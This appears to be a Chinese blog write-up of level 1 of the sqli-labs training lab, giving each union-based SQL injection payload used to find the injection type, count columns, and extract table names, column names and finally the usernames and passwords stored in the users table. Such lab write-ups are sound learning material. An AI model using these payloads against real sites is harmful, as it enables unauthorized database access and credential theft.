首页 > 数据库技术 > 详细

Sqli_labs(不定时更新)

时间:2021-04-07 12:24:55      阅读:18      评论:0      收藏:0      [点我收藏+]

第一关

  1. 首先,id=1 and 1=1和id=1 and 1=2测试是否为数字型注入。经尝试,未出现报错,所以不是数字型注入
    之后尝试id=1‘ and 1=1 --+和id=1‘ and 1=2 --+出现错误,判断为字符型注入
    技术分享图片

  2. 使用order by查询列数 id=1‘ order by 4 --+
    试到 4 报错 说明列数是3列
    技术分享图片

3.union联合查询,测试回显位 id=-1‘ union select 1,2,3 --+
技术分享图片

4.爆库 id=-1‘ union select 1,database(),3 --+
技术分享图片

  1. 爆表 id=-1‘ union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3 --+
    技术分享图片

  2. 查询user列名 id=-1‘ union select 1,(select group_concat(column_name) from information_schema.columns where table_name=‘users‘),3 --+
    技术分享图片

  3. 第六步可以看到username和password,查询一下这两列的数据
    id=-1‘ union select 1,(select group_concat(username) from users),(select group_concat(password) from users) --+
    技术分享图片

Sqli_labs(不定时更新)

原文:https://www.cnblogs.com/p201921410026/p/14626592.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!